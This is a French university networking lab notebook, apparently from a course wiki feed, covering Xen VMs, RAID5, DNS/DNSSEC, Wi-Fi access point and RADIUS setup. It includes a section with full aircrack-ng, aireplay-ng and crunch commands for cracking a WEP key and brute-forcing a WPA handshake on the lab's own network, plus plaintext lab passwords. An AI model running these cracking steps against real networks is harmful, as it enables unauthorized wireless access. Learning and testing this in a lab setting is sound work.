&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:RAID5_detestable.png&amp;diff=60280</id>
		<title>Fichier:RAID5 detestable.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:RAID5_detestable.png&amp;diff=60280"/>
				<updated>2022-11-29T00:03:54Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:RAID5.png&amp;diff=60279</id>
		<title>Fichier:RAID5.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:RAID5.png&amp;diff=60279"/>
				<updated>2022-11-29T00:03:19Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : Amace a téléversé une nouvelle version de Fichier:RAID5.png&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60278</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60278"/>
				<updated>2022-11-29T00:02:15Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Sécurisation des données - RAID5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
===DNS===&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.48&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  193.48.57.0/24;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===DNSSEC===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes;&lt;br /&gt;
dnssec-validation yes;&lt;br /&gt;
dnssec-lookaside auto;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Création du répertoire &amp;lt;code&amp;gt;detestable.site.dnssec&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;mkdir /etc/bind/detestable.site.dnssec/&lt;br /&gt;
cd /etc/bind/detestable.site.dnssec/&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature de clefs de zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-ksk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-ksk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature des enregistrements :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-zsk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-zsk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-ksk.key&amp;amp;quot;&lt;br /&gt;
$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-zsk.key&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Signature des enregistrements de la zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o detestable.site -k detestable.site-ksk ../db.detestable.site detestable.site-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;demineur.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site.signed&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier &amp;lt;code&amp;gt;detestable.site-ksk.key&amp;lt;/code&amp;gt;) à Gandi.&amp;lt;br /&amp;gt;&lt;br /&gt;
L’algorithme utilisé est le 8 (RSA/SHA-256).&lt;br /&gt;
&lt;br /&gt;
=== Tester DNSSEC : ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cd /etc/bind/&lt;br /&gt;
dnssec-verify -o detestable.site db.detestable.site.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vérifier son DNS avec dnsviz ===&lt;br /&gt;
[[Fichier:dnsviz_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
